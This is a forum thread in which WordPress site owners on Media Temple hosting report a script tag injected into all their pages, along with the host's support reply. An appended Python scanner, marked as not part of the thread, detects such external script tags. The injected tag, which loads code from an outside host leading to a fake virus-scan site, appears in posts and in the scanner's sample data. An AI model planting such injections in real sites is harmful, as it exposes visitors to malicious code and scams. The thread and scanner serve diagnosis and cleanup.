Found a weird script in my WordPress pages
Hey, today I was looking through my pages and all of a sudden I have the script <script src="http://ue.oeaou.com/31"></script> in all of them. Did my WordPress get hacked or what is this? It is in all my WordPress pages now.
Weird, I just found it too, and when you load that page you see JavaScript code. Towards the bottom is another URL, and if you follow that one you get a spam site that “scans” your computer for viruses. How did they get this on all my posts?
I have the same issue on several of my sites, but not on all. Maybe it really has something to do with an installed plugin, but at the moment I don’t believe this, as my sites use different plugins.
I have the same issue today. All sites on my Media Temple host have been affected.
@thekmen, are you on a shared server with (mt)? Or a dedicated box?
@gtrutch yeah, on their grid service plan.
I got hacked with the <script src="http://ue.oeaou.com/31"></script>. I’m on the Media Temple (gs) hosting.
Media Temple support sent me this, claiming it’s not them… After reading all of these posts in the forum I am finding it hard to believe. But here is what they said.
Hello and thank you for contacting (mt) Media Temple Support.
We understand that this kind of issue can be quite inconvenient and frustrating. However, we have done a deep analysis of the (gs) Grid-Service and found that our infrastructure is secure and is not a source of website vulnerability. Most likely, you have fallen victim to an application-level vulnerability or your FTP/database login credentials were obtained by a malicious outside party. Please note that issues of this type are not limited to any one application, web technology, or hosting provider. To begin moving forward, we strongly recommend that you utilize this article to work on recovering from a site compromise:
http://wiki.mediatemple.net/w/Recovering_from_a_site_compromise
If you do not feel comfortable resolving compromise-related issues yourself, Sucuri.net has extended a substantial discount on their scan/cleanup services to (mt) customers:
http://sucuri.net/mediatemple
If you are experiencing a “redirect hack,” in which your domain is unexpectedly redirected to an external site, please go here for cleanup instructions:
http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit
For sites that have been denoted as suspicious by Google, once your site has been relieved of all malicious content, you will want to request a re-indexing of your site(s) via Google Webmaster Tools. More information about the review process is available in Google’s Webmaster Help Center, and here are the related resources:
http://www.google.com/webmasters/tools
http://www.google.com/support/webmasters/bin/answer.py?answer=163633
If you happen to be running WordPress, and you have noticed the appearance of an unexpected WordPress user in your database, for example “johnnyA”, “johnnyB”, or “amin”, you will want to remove those users as soon as possible. Also, here is a third-party article that you may find helpful in removing any injected code:
http://www.uhleeka.com/blog/2010/07/johnnya-wordpress-malware-on-mediatemple/
In addition, here are instructions on how to “harden” a WordPress blog:
http://codex.wordpress.org/Hardening_WordPress
http://www.smashingmagazine.com/2010/07/01/10-useful-wordpress-security-tweaks/
For a helpful list of security best-practice articles and additional security information related to (mt), please visit our newly created security resource in the (mt) Wiki:
http://mediatemple.net/security
Please let us know if you have any additional questions.
We got the exact same auto-response from them.
Wait, so we’re all on Media Temple?
Yeah, all seem to be on Media Temple and getting the same auto-response email by the looks of it.
I am kind of over Media Temple, personally – for the $20 a month for the grid service I seem to get nothing but a prettier admin panel. In terms of speed and bandwidth DreamHost was the same but half the price.
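Added example, not part of the original thread and not from any poster or from Media Temple: one way to list which posts carry a <script> tag loaded from a host the site does not normally use, which is the symptom reported above. The allowlist hosts, the function names and the sample rows are assumptions constructed for illustration; in practice the rows would be (ID, post_content) pairs read from a database export.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption; set per site).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in an HTML fragment."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <SCRIPT SRC=...> matches.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def external_scripts(post_content, allowed_hosts=ALLOWED_HOSTS):
    """Return script src values whose host is not on the allowlist."""
    parser = ScriptSrcCollector()
    parser.feed(post_content)
    parser.close()
    hits = []
    for src in parser.sources:
        host = urlparse(src).hostname  # None for relative URLs such as /wp-includes/...
        if host and host.lower() not in allowed_hosts:
            hits.append(src)
    return hits

def scan_posts(rows, allowed_hosts=ALLOWED_HOSTS):
    """Map post ID -> list of unexpected script sources, for affected posts only."""
    report = {}
    for post_id, content in rows:
        hits = external_scripts(content, allowed_hosts)
        if hits:
            report[post_id] = hits
    return report

# Constructed sample rows: (post ID, post_content). Rows 2 and 4 carry the injected tag.
SAMPLE_ROWS = [
    (1, "<p>Hello world</p>"),
    (2, '<p>Post body</p><script src="http://ue.oeaou.com/31"></script>'),
    (3, '<script src="/wp-includes/js/jquery/jquery.js"></script><p>ok</p>'),
    (4, "<p>x</p><SCRIPT SRC='//ue.oeaou.com/31'></SCRIPT>"),
]

if __name__ == "__main__":
    for post_id, hits in scan_posts(SAMPLE_ROWS).items():
        print(post_id, hits)
```

A post that shows up in the report still needs its content cleaned, and the same scan can be rerun afterwards to confirm nothing remains.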